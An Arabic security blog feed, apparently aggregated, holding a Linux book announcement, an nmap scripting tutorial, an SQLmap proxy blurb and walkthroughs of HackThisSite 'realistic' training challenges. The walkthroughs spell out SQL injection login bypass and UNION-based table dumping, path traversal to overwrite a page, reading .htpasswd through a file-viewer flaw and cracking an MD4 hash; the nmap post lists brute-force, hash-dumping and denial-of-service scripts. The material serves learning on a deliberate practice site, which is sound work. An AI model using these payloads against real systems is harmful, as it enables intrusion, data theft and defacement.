هي مجموعة من الحروف والأرقام وتكون فريدة (غير قابلة للتكرار مع أكثر من مستخدم) يستخدمها الـ PHP للمحافظة على الـ session وتُحفظ عادةً في الـ Cookies. وقد تُستخدم كما في هذا المثال لضمان عدم احتساب الصوت أكثر من مرة.

كتاب : سطر أوامر لينكس

$
0
0

cover

 

يعتبر سطر الأوامر في لينكس من أهم مميزات هذا النظام الرائع  لأنه يسمح لك بتنفيذ أشياء معقدة بطرق بسيطة جدا لذا من الطبيعي أن تجد نافذة سطر الأوامر دائمة مفتوحة عند مستخدمي لينكس ، فعلى الرغم من كون سطر الأوامر لغة برمجة تفسيرية إلا نه يمكن لغير الخبراء والمبرمجين استعماله بدون أي صعوبة وبسهولة جدا والتعامل مع كل خصائص النظام من سطر الاوامر . يمكنك ادارة النظام بالكامل دون فتح نافذة واحده وهنا تاتي المتعة الحقيقة للتعامل مع نظام لينكس , بالعكس هناك بعض المهام التي يصعب تنفيذها بواجهة رسومية يمكن تنفيذها بسرعة ومرونة بواسطة سطر الاوامر .

 

تم اصدار كتاب : سطر اوامر لينكس  المترجم من الكتاب The Linux Command Line اكثر الكتب مبيعاً التي تتحدث عن لينكس للمؤلف : Willam E. Shotts, Jr.‎ . الذي تمت ترجمته بالكامل إلى اللغة العربية بواسطة الأخ عبد اللطيف أيمش وبدعم من موقع وادي التقنية، الكتاب يعد المرجع العربي الأضخم حاليًا لسطر الأوامر في نظام لينكس ويتكون من 537 صفحة .

يبدأ الكتاب بشرح المفاهيم الأساسية في سطر الأوامر كالصدفة (Shell)، ومحاكيات الطرفية (Terminal Emulator)، وآلية التنقل في نظام الملفات، والقيام بالعمليات الأساسية على الملفات و المجلدات… ثم يتدرج إلى شرح التوسعات (Expansion)، وإعادة توجيه (Redirect) المدخلات والمخرجات، والأذونات (Permissions)، والعمليات (Processes)، والبيئة (Environment)، ومحرر vi.

ثم ينتقل إلى شرح المهام الأساسية في استخدام الحاسوب كإدارة البرمجيات، ومعالجة النصوص وتنسيقها، والطباعة، وبناء البرامج من المصدر.

ثم يتناول الباب الأخير برمجة الشِل (Shell Scripting) التي هي تقنيةٌ تُستخدم لأتمتة المهام؛ فيبدأ بشرح المفاهيم الأساسية في البرمجة، وطريقة إنشاء البرامج، ثم ينتقل إلى شرح بُنى التحكم والمعاملات الموضعية والمصفوفات. ثم ينتهي الكتاب بفصل يجمع ما بقي من الأمور المتفرقة. وكل ذلك موزعٌ على 36 فصلًا وما يزيد عن 500 صفحة.

رُخِّص هذا الكتاب برخصة المشاع الإبداعي (بنفس رخصة الكتاب الأصل) النسبة، غير تجاري، بلا اشتقاق الإصدار الثالث؛ لذا، يمكن تنزيل ونشر وتوزيع هذا الكتاب مجانًا دون قيود.

تحميل الكتاب .

مقال : حل التحدي الثاني من تحديات موقع hackthissite – realistic

$
0
0

المرحلة: Realistic Level: 2 (Chicago American Nazi Party)

الصعوبة: سهلة

الرابط: https://www.hackthissite.org/playlevel/2/

المهمة: مجموعة من العنصريين ينظمون مسيرة في شيكاغو، يجب عليك إيقافهم بإسقاط الموقع.

الرسالة: أهلا، أُخبرت أن لديك بعض المهارات الرآئعة المتعلقة بالقرصنة. مجموعة من العنصريين يحاولون التنظيم عبر موقعهم هذا القيام بمسيرة ضد الأمريكيين من أصول غير أمريكية! لا يجب أن ندع شيئًا كهذا يحدث. إذا استطعت الدخول إلى صفحة الأدمن وكتابة رسالة في صفحتهم الرئيسية سيكون هذا رآئعا.

 

اذهب الآن وحاول أن تحل المشكلة. لا تتعدى هذه النقطة إذا كنت تريد حل التحدي بنفسك..

 


 

 

التلميح الأول:

يجب عليك أولا الوصول إلى صفحة حيث تستطيع إدخال بعض المدخلات، فأنت تحتاج غالبا إلى شئ كـ SQL Injection

 

التلميح الثاني:

ألا تلاحظ شيئا غريبًا في آخر الكود الخاص بالصفحة الرئيسية؟

 

التلميح الثالث:

جرب أن تدخل (') في خانة اسم المستخدم وكلمة المرور، ما الرسالة التي تشاهد؟

 

الحل:

دائما ضع هدفك أمام عينيك قبل البدء، أنت تريد الدخول إلى صفحة الأدمن، إذا عليك أولا البحث عنها. أحد طرق البحث هي تجربة بعض الكلمات المشهورة كـ admin.php أو wp-admin ، فباستخدامهما تكون الروابط كالآتي:
https://www.hackthissite.org/missions/realistic/2/admin.php

https://www.hackthissite.org/missions/realistic/2/wp-admin

وتستطيع تجربة ما يغلب على ظنك أنه قد يكون اسمًا لصفحة الأدمن. في هذا التحدي الاسم مختلف تماما، لن تستطيع غالبا تخمينه.

دعنا نجرب طريقة مختلفة، قد يكون هناك أي خيط في الصفحة الرئيسية يُوصلنا إلى الصفحة التي نريد. حاول الإطلاع على الكود المتعلق بالصفحة الرئيسية! ستلاحظ رابطًا مخفيا في آخر الصفحة!
hackthissite - realistec - 2 - 1
إذن دعنا نجرب: https://www.hackthissite.org/missions/realistic/2/update.php

وجدنا أخيرا بُغيتنا، صفحة للدخول إلى صفحة تحكم الموقع. يُوجد العديد من الطرق لمحاولة الدخول، منها تجربة عدد من كلمات المرور بأحد الأدوات المتوفرة، أو البحث عن ملف يحتوي على كلمات المرور في الموقع (في التحديات القادمة سنتحدث عن كلتا الطريقتين إن شاء الله). ولكن قبل تجربة أحدى تلك الطريقتين، جرب الطريقة الأكثر شيوعا وهي الـ SQL Injection.

دعنا أولا نتأكد أن هذه الصفحة معرضة لمثل هذا، أدخل (') في خانة اسم المستخدم وكلمة المرور! ستظهر لك رسالة: SQL Error إذن تخميننا كان صحيحا.

 

دعنا الآن نفكر، ما هي الـ SQL Query الذي يستخدمها هذا الموقع للقيام بالتأكد من صحة الباسورد.. تستطيع أن تجرب بإنشاء قاعدة بينات تحتوي على جدول واحد (وهو جدول الأدمن) وتقوم بالتجربة عليه أولا ثم التجربة في الموقع. هناك العديد من الحلول الصحيحة لهذا التحدي. أحداها أن تقوم بإدخال:

' OR 1=1 LIMIT 1/*

في خانة إسم المستخدم.

 

ملحق:

لماذا قمنا بإدخال

' OR 1=1 LIMIT 1/*

كما ذكرنا، عليك أولا أن تتوقع ما هي الـ Query المستخدمة. لنفرض مثلا أنها شئ كهذا:

select * from users where username = 'user' and password = 'pass';

من المتوقع أيضا أن الـ php تتأكد من عدد النتائج، فإذا كانت نتيجة واحدة اعتبرتها صحيحة. إذا قمت بإدخال 1=1 وحسب بدون LIMIT 1 ستقوم SQL بإرجاع جميع الجدول، لإن 1=1 صحيحة في كل الحالات! أما قيامنا بإدخال “*/” في آخر الـ Query فهي طريقة لإنهاء الـ Query بدون إكمالها. أي أن SQL سيعتبرها:

select * from users where username = ' ' or 1=1 LIMIT 1;

وسيقوم بإرجاع أول صف في الجدول دائما.

 

مقال : حل التحدي الثالث من تحديات موقع hackthissite – realistic

$
0
0

المرحلة: Realistic Level: 3 (Peace Poetry :HACKED)

الصعوبة: معتدلة

الرابط: https://www.hackthissite.org/playlevel/3/

المهمة: فتاة صغيرة قامت بعمل صفحة إلكترونية لمشاركة الشعر المتعلق بالسلام وتفهم الآخر. أحد الفاشيين قام بالإستيلاء على الموقع واستخدامه لنشر الفكر النازي. هل تستطيع إصلاح الموقع؟

 

الرسالة: مرحبا، لدي موقع يستطيع الناس فيه أن يقوموا بمشاركة شعرهم الذي يتحدث عن السلام. أفعل هذا بنية حسنة، ولا أفهم لماذا تم الإستيلاء على الموقع. هل تستطيع استعادة الموقع من فضلك. ستجد الرابط هنا.

 

اذهب الآن وحاول أن تحل المشكلة. لا تتعدى هذه النقطة إذا كنت تريد حل التحدي بنفسك..


 

 

التلميح الأول:

يجب عليك أولا الوصول إلى صفحة حيث تستطيع إدخال بعض المدخلات.

 

التلميح الثاني:

ألا تلاحظ شيئا غريبًا في آخر الكود الخاص بالصفحة الرئيسية؟ تعليق ربما..

 

التلميح الثالث:

عندما تشارك بشعر جديد، ما الاسم الذي يُخزن به في الموقع؟ هل تستطيع التلاعب بالإسم ليظهر الشعر في مكان آخر في الموقع؟

 

الحل:

كالعادة، دعنا أولا نفكر مالذي نحتاج إليه؟ ومن ثم ابدأ بعدها بالبحث في الموقع عن شئ يُوصلك إلى ما تريد. أنت تريد استعادة الصفحة الرئيسية. بقراءة الكود الخاص بالصفحة نجد أن المُخترق ترك تعليقا يقول فيه أنه لم يحذف الصفحة القديمة! هو فقط غير الاسم ليكون “oldindex.html” بدلا من index.html..

جيد، دعنا إذا نذهب إلى:

https://www.hackthissite.org/missions/realistic/3/oldindex.html

بالبحث في هذه الصفحة وقراءة ما كُتب في صفحة “submit the poetry”، فإن باستطاعتنا حفظ ما نريد في الصفحة وبالإسم الذي نريد. لماذا لا نجرب حفظ الصفحة بإسم index.html والمحتوى هو محتوى oldindex.html (الكود)!

إذا جربت هذا فلن يحدث شئ! لماذا؟ ماذا نسينا؟؟ قد تكون الصفحة تُحفظ في مجلد، وليس في الـ root. إذن لنجعل الإسم

../index.html

تم الحل..

 

ملحق:

كيف أجد كود الصفحة؟

أضغط في أي مكان فارغ في الصفحة على الزر اليمين للماوس، أختر: “View Page Source”، هذا هو كود الصفحة كاملا.

لماذا index.html لم يعمل، بينما index.html/.. عمل بشكل صحيح؟ ما الفرق بينهما؟

/.. تعني الرجوع إلى الخلف مجلد. لنفرض مثلا أنك تقوم بتطوير موقعك الخاص. لنفرض وجود صفحة بإسم mypage.html في المسار: www.yoursite.com/example/mypage.html. ولنفرض أيضا وجود صورة اسمها myphoto.jpg وموجودة في المسار: www.yoursite.com/myphoto.jpg

تستطيع الإشارة إلى الصورة من داخل mypage.html بطريقتين، إما عن طريق ذكر المسار كاملا: “www.yoursite.com/myphoto.jpg” وهذا يسمى absolute path. والطريقة الأخرى وهي أن تسميه: myphoto.jpg/.. لإنك لو لم تضع /.. لن يفهم السيرفر أنك تريد الرجوع إلى المجلد السابق لإيجاد الصورة وهذا يسمى relative path.

للإستزادة: http://www.coffeecup.com/help/articles/absolute-vs-relative-pathslinks/

 

تمرين:

ماذا لو كانت الصورة في المسار: www.yoursite.com/myphotos/myphoto.jpg ؟ ماذا سيكون الـ relative path في هذه الحالة؟ شارك الإجابة في التعليقات..

 

فيديو : إستخدام proxy داخل SQLmap

$
0
0

قمت مسبقاً بعمل شرح بسيط لبرنامج SQLmap تحدثت فيه عن فوائده وكيفية العمل عليه , ويعتبر برنامج SQLmap من أقوى البرامج الموجوده في مجتمع الحماية العالمي التي تتعلق بإستغلال ثغرات الحقن (SQL injection) بكفاءة وإحترافيه عالية , وفي هذا الفيديو قمت بشرح كيفية إستخدام proxy داخل أداة SQLmap وتمرير الطلبات إلى البروكسي الموجوده داخل BurpSuite وإستعراض الطلبات بشكل كامل , هذه العملية تفيدنا أيضاً في إستخدام بروكسي خارجيه للتخفي أثناء القيام بعمليات إختبار إختراق أو تجربة سلوكيات البرمجيات وجدران الحمايه لها.

 

مقال : حل التحدي الرابع من تحديات موقع hackthissite – realistic

$
0
0

المرحلة: Realistic Level: 4 (Fischer’s Animal Products)

الصعوبة: معتدلة

الرابط: https://www.hackthissite.org/playlevel/4/

المهمة: موقع لبيع الملابس الفارهة. هذا الموقع تملكه شركة تقوم بقتل الحيوانات لتصنع ملابس باهظة الثمن. ساعد جميعات حقوق الحيوان من خلال الحصول على عناوين البريد الإلكتروني للمشاركين في الموقع.

 

الرسالة: مرحبا، نصحني أحد أصدقائي بالحديث إليك بخصوص موقع إلكتروني تملكه شركة تقتل مئات من الحيوانات كل يوم. دخلت على موقعهم الإلكتروني ورأيت أنهم يمتلكون قائمة بعناوين البريد الإلكتروني لزبائنهم. هل بإمكانك الحصول عليها لأرسل لهم رسالة لأخبرهم ما يتسببون به من قتل لآلاف الحيوانات! إذا حصلت على القائمة أرسلها لي من فضلك. هذا هو موقهم: http://www.hackthissite.org/missions/realistic/4/

 

* إذا قمت بالحصول على قائمة العناوين الإلكترونية أرسلها من خلال الرسائل الداخلية في موقع hackthissite.org لـ SaveTheWhales

 

اذهب الآن وحاول أن تحل المشكلة. لا تتعدى هذه النقطة إذا كنت تريد حل التحدي بنفسك..


 

التلميح الأول:

هل جربت إدخال بريد إلكتروني لا يحتوي على “@”! مالرسالة التي ترى؟

 

التلميح الثاني:

هل جربت SQL Injection على صفحة

products.php?category=

 

التلميح الثالث:

هل تعلم كيف تستخدم UNION ALL لدمج أكثر من Query ؟

 

الحل:

أول ما يلفت انتباهك عند دخولك إلى الموقع هو بريدهم الإلكتروني، أدخل بريدا إلكترونيا وهميا لترى الرسالة التي تظهر. لا شئ مثير للإهتمام.. جرب الآن إدخال بريد خاطئ! ستظهر لك هذه الرسالة:

Error inserting into table “email”! Email not valid! Please contact an administrator of Fischer’s

نعرف الآن أن الموقع يستخدم قاعدة بيانات، وأن اسم الجدول الذي نريد هو: email

دعنا نشاهد بقية الموقع. سيثير انتباهك إمكانية استخدام SQL Injection في صفحة products.php?category=

لنجرب إدخال (') بعد =1 مثلا، ليصبح الرابط:

https://www.hackthissite.org/missions/realistic/4/products.php?category=1′

 


صورة معطوبة! مثير للإهتمام. دعنا نجرب عرض 1 و 2 معا، من خلال استخدام or ليكون الرابط:

https://www.hackthissite.org/missions/realistic/4/products.php?category=1 or 2

ظهرت المنتجات كلها! إذن كان ظننا في محله. لنجرب UNION ALL لإظهار الإيميلات ايضا، سيكون الرابط بهذا الشكل:

https://www.hackthissite.org/missions/realistic/4/products.php?category=1 union all  select 1,2,*,4 from email;/*

 

أخيرا، أرسل جميع هذه الإيميلات باستخدام نظام الرسائل داخل موقع hackthissite.org إلى: SaveTheWhales

 

ملحق:

لماذا لم نجرب SQL Injection في خانة البريد الإلكتروني؟

تستطيع هذا، ولكن تذكر أن مهمتك هي الحصول على البريد الإلكتروني للمشتركين. هذه الصفحة لا تقوم بإرجاع النتائج إليك، كل ما تقوم به هو إعلامك إذا كان هناك خطأ أو أن البريد قد تم إضافته. لن تستفيد كثيرًا من الـ SQL Injection في هذه الحالة.

 

ما هي UNION ALL، ولماذا توقفت عند 4؟ ولماذا اخترت الخانة الثالثة لتضع بها الـ * ؟

UNION ALL هي طريقة لجمع 2 Quiries لتكون واحدة بشرط تساوي عدد الـ colums. الطريقة التي اتبعتها هو تجربة عدد الخانات من 1 حتى 4 تباعا حتى ظهر لي الناتج الصحيح. لتكون الروابط هكذا:

 

https://www.hackthissite.org/missions/realistic/4/products.php?category=1 union all  select 1;/*

https://www.hackthissite.org/missions/realistic/4/products.php?category=1 union all  select 1,2;/*

https://www.hackthissite.org/missions/realistic/4/products.php?category=1 union all  select 1,2,3;/*

https://www.hackthissite.org/missions/realistic/4/products.php?category=1 union all  select 1,2,3,4;/*

لن يظهر لك أي نتيجة صحيحة سوى في الرابط الأخير. ستلاحظ أيضا أن الرقم 2 و 3 يظهران بشكل واضح في الصفحة، تستطيع إذا استخدام أحدهما لعرض نتيجة بحثك التي تريد فيها.

 


مقال : حل التحدي الخامس من تحديات موقع hackthissite – realistic

$
0
0

المرحلة: Realistic Level: 5 (Damen Telemarketers)
الصعوبة: معتدلة
الرابط: https://www.hackthissite.org/playlevel/5/
المهمة: هناك موقع ينتهك الخصوصية الشخصية، المطلوب أن تحصل على كلمة المرور للأدمن وتمسح قاعدة البيانات.

الرسالة: مرحبا، أنا هاكر أيضا ولكني أريد مساعدتك! خلال الأيام الماضية كانت شركة telemarketers يتصلون بي ليلا ونهارا وهذا سبب لي إزعاجًا كبيرا. استوليت على موقعهم ومسحت جميع الأرقام من الموقع، ولكن هذا كان حلا مؤقتا، فهم يمتلكون نسخة من جميع الأرقام في قاعدة بيانات محمية برقم سري مشفر. عندما قمت بإختراقهم لاحظت أن جميع ما يستخدمونه قديم 10 سنوات تقريبا. بحثت وأعتقد أن الرقم السري المشفر يُطلق عليه hash value. أعتقد أن باستطاعتك فكها والحصول على الرقم السري.
اذهب الآن وحاول أن تحل المشكلة. لا تتعدى هذه النقطة إذا كنت تريد حل التحدي بنفسك..


 

 

التلميح الأول:
في قسم الأخبار في الموقع، ألا ترى خبرا مثيرا للإهتمام؟
التلميح الثاني:
هل تعلم ما هو ملف robots.txt ولماذا يستخدم؟
التلميح الثالث:
كما هو مذكور في الرسالة، الهاش المستخدمة قديمة.

 

الحل:
عند محاولة الدخول إلى قاعدة بيانات الموقع سيُطلب منك كلمة المرور. بالطبع قد تفكر بالطريقة الـ brute force، وهي أن تجرب كل الإمكانيات حتى تقوم بفتح الموقع. هذا قد يأخذ الكثير من الوقت.. دعنا أولا نقرأ الرسالة مرة أخرى، ذُكر فيها وجود كلمة مرور مشفرة. بالنظر في صفحات الموقع ستجد خبرا فحواه أن صاحب الموقع قد أخفى بعض الصفحات عن جوجل. هذا قد يعني أنه أضافها إلى الملف robots.txt. لنحاول رؤية الملف:

https://www.hackthissite.org/missions/realistic/5/robots.txt

ستلاحظ فورا اسما مثيرا للإهتمام: secret.. لنحاول رؤية ما فيه:

https://www.hackthissite.org/missions/realistic/5/secret

ومن ثم ندخل على: admin.bak.php لنجد كلمة المرور المشفرة التي نريد..
0c5bb7b10b5c39f460737947beff730d
بمساعدة المعلومة التي لدينا (قدم الأدوات المستخدمة في الموقع) قد يكون تخمينا جيدا أن نقول أن هذ التشفير تم باستخدام: md4
وباستخدام برنامج Cain & Abel
نستطيع فك تشفير الكلمة والدخول على قاعدة البيانات.

 

 

ملحق:
تستطيع تحميل أداة Cain & Abel من هنا: http://www.oxid.it/cain.html

مقال : حل التحدي السادس من تحديات موقع hackthissite – realistic

$
0
0

المرحلة: Realistic Level: 6 (ToxiCo Industrial Chemicals)

الصعوبة: صعبة

الرابط: https://www.hackthissite.org/playlevel/6/

المهمة: فك تشفير رسالة ستساعد على إنقاذ البيئة.

 

الرسالة: مرحبا، لدي رسالة مشفرة أريد فك تشفيرها. أنا أعمل في شركة تنشر سمومها ومخلفاتها في النهر، وقد أتى إلينا مفتشو البيئة وكتبوا تقريرا بعدم وجود أي مخلفات تلقى في النهر! أنا متأكد إن هذا غير صحيح، فالنهر بجانب الشركة مليئ بالسموم، وأتوقع إنه قد تم دفع الأموال للمفتشين. بعد تنصتي على الشبكة الداخلية لدينا في الشركة، استطعت الحصول على رسالة مشفرة، ستجدها هنا . هل تستطيع فك تشفيرها؟ أرسلي الرسالة الأصلية إذا استطعت فك التشفير.

اذهب الآن وحاول أن تحل المشكلة. لا تتعدى هذه النقطة إذا كنت تريد حل التحدي بنفسك..


 

التلميح الأول:
جرب أن تُدخل حرفا واحدا بدون كلمة مرور، ماذا تلاحظ؟

 

التلميح الثاني:
أدخل حرفا واحدا بدون كلمة مرور واجمع الثلاث أرقام، ثم أدخل نفس الحرق مع كلمة مرور “a” مثلا، ماذا تلاحظ؟

 

التلميح الثالث:
الرقم الأول + الرقم الثاني + الرقم الثالث = الحرف الأصلي + كلمة السر.

 

الحل:

تستطيع البحث عن اسم الخوارزمية في الانترنت لفهم كيفية عملها، ومن ثم ستكون قادرا على فك تشفيرها. ولكن دعنا أولا نحاول فهم الخوارزمية بدون الإستعانة بأي مصادر خارجية. حاول أن تُدخل الحرف “a” ليتم تشفيره، وأدخل أي كلمة سرية تريد. ستظهر لك 3 أرقام. جرب أن تُدخل حرفان، كـ “ab” ستظهر لك 6 أرقام. أي أن الخوارزمية تقوم بتشفير كل حرف بـ 3 أرقام. الآن أدخل حرف “a” بدون كلمة سرية، ستلاحظ 3 أرقام! حاول أن تجمعهم، سيكون حاصل جمعهم 97 وهو الـ ascii representation للحرف a. جرب إدخال نفس الحرف ولكن ضع كلمة سرية من حرف واحد، “b” مثلا. حين تجمع الثلاث أرقام لن تكون 97 هذه المرة، ولكنها ستكون 195 وهي 97 + 98 (b = 98). إذن نستطيع أن نقول أن

الرقم الأول + الرقم الثاني + الرقم الثالث = الحرف الأصلي + كلمة السر.

إذن، الحرف الأصلي = مجموع الأرقام الثلاثة – كلمة السر.

إذن، كلمة السر = مجموع الأرقام الثلاثة – الحرف الأصلي

فك هذه الشفرة أسهل مما تتوقع، فلست بحاجة لمعرفة كلمة السر لتقوم بفكها.

هناك عدة طرق لفك الشفرة، أحدها الإعتماد على حرف يتكرر كثيرا في اللغة الإنجليزية كـ الحرف “a” مثلا أو المسافة وسنستخدم المسافة (space). المسافة = 32 في ascii representation .

وهذا الجدول يحتوي على الحروف الإنجليزية وما يقابلها من ascii.

hackthissite - realistec - 6 - 1

لنقوم أولا بجمع كل 3 أرقام معا ونضعهم في array. من ثم نقوم بطرح المسافة (32) من  أول رقم (وهو مجموع أول 3 أرقام)، لنحصل على كلمة مرور مُتوقعة. نقوم بتجربة هذه الكلمة على كل الـ array من خلال طرح هذه الكلمة من كل الأرقام، إذا كانت الرسالة مفهومة فهذه هي كلمة المرور الصحيحة، إن لم تكن، نجرب طرح المسافة من الرقم الثاني، وهكذا..

بعد الإنتهاء من فك التشفير أرسل الرسالة بعد فك تشفيرها إلى “ToxiCo_Watch” من خلال الرسائل الداخلية للموقع.

 

ملحق:

تستطيع كتابة الكود بنفسك لحل التحدي، ولكن إن أردت الإستعانة بكود جاهز، هذا اللينك يحتوي على أحد هذه الأكواد (الكود الأول للتشفير، الكود الثاني لفك التشفير):

http://codereview.stackexchange.com/questions/4712/xecryption-encryption-and-decryption-script

 

لماذا اخترنا المسافة؟

المسافة تتكرر كثيرا في الرسائل، فستكون بعد أول كلمة بلا ريب، ولهذا اخترناها. تستطيع اختيار أي حرف آخر، وفي أول ظهور له في الرسالة ستحصل على كلمة السر الصحيحة الخاصة بك.

مقال :كيف يتم استخدام سكربتات اداة nmap اثناء عمليات الفحص

$
0
0

بسم الله الرحمن الرحيم

في مقال سابق تعرفنا على Nmap Scripting Engine وكيف ان اداة nmap لم تعد محصورة على وظائف معينة  فقط موجودة في خيارات الاداة مهما كانت قوية ,, يمكن الان برمجة سكربت يقوم بوظيفة معينة خارج وظائف الاداة ويستخدم السكربت اثناء عملية الزحف والفحص ليطبق الاكشين المراد عملة , اقرأ المقال السابق لتكتمل الصورة لديك .

سكربتات اداة nmap :

nmap scritp list

كما تلاحظون في الصورة يوجد 486 سكربت موجود في الموقع الرسمي و 113 مكتبة برمجية يمكن لمبرمج السكربت استخدامها في السكربتات وكذلك تم تصنيف وترتيب السكربتات كما هو  في الصورة ,  قبل ان تبدا بأي عملية فحص باستخدام Nmap يجب علينا اولا بأجراء عملية تحديث للسكربتات  واضافة اي سركبتات جديده ان وجدت  باستخدام الامر التالي :

nmap –script-updatedb

الان قاعدة البيانات الخاصة بالسكربتات اصبحت لديك حديثه وتحتوي الاداة المنصبة لديك اخر السكربتات المضافة الى الاداة وتستطيع الدخول الى المسار التالي للاستعراض السكربتات المتوفرة :

/usr/share/nmap/scripts

جميع السكربتات  السكربتات موجودة بهذا المسار وايضا يمكننا اضافة سكربتات خاصة بنا الى المسار عن طريق النسخ اليه او يمكن تحديد السكربت اثناء كتابة الامر اذا كان لديك في مجلد اخر . على سبيل المثال

coustom script

في هذا الامر استخدمنا سكربت غير موجود في المجلد الافتراضي للأداة وهذا يساعد كثيرا اثناء استخدام سكربتات قمنا بتحميلها من الانترنت وغير موجوده في الاداة افتراضية قد تكون برمجة خاصة بك او قمت بتنزيلها من احد المطورين للبحث عن ثغره خاصة او جديده  .

الحصول على المساعدة

نريد الان المساعدة وبعض المعلومات عن سركبت معين , نقوم بتطبيق الامر التالي :

script-help

استخدمنا اسم التطبيق ثم كلمة dos وهي التصنيف التي يتواجد به السكربت وهو تصنيف سكربتات هجمات حجب الخدمة , ماذا اذا كنت اريد استعراض كامل سكربتات تصنيف معين المتوفره لدي في الادة نستطيع استبدال اسم السكربت برمز * و يمكن استبدال اسم التصنيف ايضا , انظر الى هذا المثال

list-script

في هذة الحالة انا اريد اي سكربت يبدا اسمة بــ DNS ولكن لا اعرف اسمه بالضبط ولا اعرف في اي تصنيف ايضا لهذا اخبرتة اعرض لي كل السكربتات التي تبدا باسم DNS في جميع التصنيفات التي اشرنا اليها برمز  * .  جميع المعلومات التي تحصل عليها من سطر الاوامر لديك يمكن تصفحها وتصفح السكربتات وتحميلها من الموقع الرسمي من الرابط من هنا او الرابط الذي سوف يظهر لك اثناء تنفيذ الامر .

 

استخدام السكربتات اثناء عملية الفحص

كما عرفنا سابقا ان السكربتات مصنفة الى عدة تصنيفات ويمكننا تطبيق جميع سكربتات تصنيف معين كلها مثل safe او version ويجب عليك ان تعلم ان بعض السكربتات لا تعمل الا بادخال متغيرات معينة مثل بعض السكربتات التي تقوم بهجوم التخمين يجب ان تتوفر لها بعض المعلومات في متغيرات السكربت لهذا لن تعمل سكربتات التي تحتاج متغيرات معينة في مثل هذه الحالة استخدم  السكربتات التي تحضر لك معلومات او تنفذ امر وهي لا تحتاج الى مدخلات , يفضل ان تستخدم السكربتات التي تريد ويمكنك اختيار اكثر من سكربت كما سوف نعرف لاحقا .

exe-nmap-script

في المثال السابق سوف تكون النتيجه العديد والعديد من المعلومات لانها ناتجه عن الكثير من السكربتات انا شخصيا لا احبذ هذا الامر بسب ان الكثير من السكربتات سوف تطبق وتجعل الامر اكثر تعقيد والمعلومات تكون كثيره وغير منظمه اذا استخدمت xml في اخراج نتيجه البحث سوف يكون افضل . يمكن ايضا ان نقوم بتطبيق سكربت واحد معين اثناء فحص مثلا ويب سيرفر على http مثلا دعونا نستعرض ماذا نملك من سكربتات خاصة بـ http كما تعلمنا :

http nmap script

قمت بحفظ نتيجه الامر الى ملف نصي لانها سوف تكون كبيره جدا , كما تلاحظون لديكم في في الملف النصي  العشرات من السكربتات الخاصه بخدمة http  سوف نقوم بتطبيق احد السكربتات كمثال

http-csrf

كما تلاحظون اذا اردنا استخدام سكربت معين واحد يمكن كتابة اسمه فقط بعد الخيار script كذلك استفد من خيارات اداة Nmap عن طريق تحديد البورت 80 فقط للبحث لماذا نضيع وقت في الفحص البورتات الاخرى, الاداة افتراضيا سوف تفحص جميع البورتات .

ايضا يمكننا استخدام اكثر من سكربت في عملية واحده

both-script

استخدمت سكربت banner وكذلك http-title بنفس الامر وبعملية فحص واحدة .

اهم السكربتات :

لا وجد هناك سكربت اهم من سكربت فلكل سكربت وظيفه معينة بحسب نوعية عملية اختبار الاختراق ماعليك الان سوى ان تدخل الى رابط الموقع الرسمي من هنا وتتصفح السكربتات وتتعرف علىهم وماهي الوظائف التي يقوم بها السكربت وعليك التركيز على  Script Arguments  وهي عباره عن مدخلات يجب الانتباه لها اثناء استخدام السكربت انظر الى الامثلة في صفحه كل سكربت لمعرفة كيفية تطبيق الامر بشكل سليم .

بعد ان تعلمنا كيفية اظهار وصف ومعلومات كل سكربت وكيفية تطبيق السكربتات كمجموعة سكربتات او كتصنيف كامل او سكربت وحيد يجب عليك الان التعرف على بعض السكربتات التي انصح ان تقرأ عنها وتجربها كنوع من انواع التدرب على تطبيق سكربتات اداة nmap ومعرفة طريقة عملها :

auth :

ftp-anon
http-auth
http-config-backup
http-default-accounts
http-wordpress-enum
ms-sql-dump-hashes
ms-sql-empty-password
mysql-dump-hashes
mysql-empty-password
mysql-query
mysql-users
oracle-enum-users
smb-enum-users

brute :

ssh-brute
smb-brute
oracle-brute
mysql-brute
ms-sql-brute
mikrotik-routeros-brute
ftp-brute

brodadcast :

broadcast-dhcp-discover
broadcast-dns-service-discovery
broadcast-dropbox-listener

discovery :

bittorrent-discovery
dhcp-discover
http-headers
http-open-proxy
http-php-version
mysql-databases
smb-system-info
whois-ip
smtp-open-relay

dos :

http-slowloris
smb-flood

مازال هناك المئات من السكربتات المتوفره والتي لها حالات خاصة  .

. شكرا للقراءة اتمنى لكم المزيد من الفائدة نراكم في مقالات اخرى .

مقال : حل التحدي السابع من تحديات موقع hackthissite – realistic

$
0
0

المرحلة: Realistic::7 (What’s right for America)

الصعوبة: معتدلة

الرابط: https://www.hackthissite.org/playlevel/7/

المهمة: اختراق احد المواقع التي تدعوا إلى الكراهية

الرسالة: هناك موقع على الشبكة العنكبوتية يدعو إلى الكراهية والانتقام من الآخر، أرجو منك مساعدتي على إيقاف الموقع. ستجد صفحة للأدمن في مكان ما، ربما مخفية في الملفات الداخلية للموقع. ستجد الموقع هنا.

 

اذهب الآن وحاول أن تحل التحدي بنفسك، ويمكنك الإطلاع على التلميحات إن أردت.

 

التلميح الأول:
ما اسم المجلد الذي تُحفظ فيه الصور؟ هل حاولت الدخول إليه؟

 

التلميح الثاني:
فكر في الطريقة التي يعمل بها apache server لحماية ملف معين؟ أين يتم حفظ كلمة المرور؟

 

التلميح الثالث:
هل توجد صفحة تعرض لك أي ملف تريده؟ استخدمها لعرض الملف الذي يحتوي على كلمة المرور

 

الحل:

لنبدأ أولا بالبحث في الموقع وملاحظة إذا كان يحتوي على اسم مجلد يساعدنا في بحثنا. ستلاحظ أن الصورة التي في الصفحة الرئيسية توجد في مجلد يسمى “images”. رابط الصورة: https://www.hackthissite.org/missions/realistic/7/images/gay.jpg

لنحاول الدخول على هذا المجلد باستخدام الرابط: https://www.hackthissite.org/missions/realistic/7/images/

ستجد مجلد الأدمن هناك، ولكنه محمي بكلمة مرور. تستطيع تجربة الـ brute force attack ولكنه ممنوع في هذا التحدي لذا لن نقوم بتجربته. لنرجع إلى صفحة الموقع ونكمل البحث في الموقع على خيط آخر. تذكر أن apache يقوم بحفظ كلمة المرور في ملف بداخل المجلد admin باسم:

.htpasswd

بعد البحث ستلاحظ أن الصفحة showimages.php يقوم بعرض أي ملف تريد! لماذا لا نحاول عرض الملف .htpasswd

باستخدام الرابط: https://www.hackthissite.org/missions/realistic/7/showimages.php?file=images/admin/.htpasswd

ستجد أن الصور أصبحت معطوبة، وباستخدام Inspect element لأحد الصورتين ستجد أنها تحتوي على الآتي:

administrator:$1$AAODv…$gXPqGkIO3Cu6dnclE/sok1

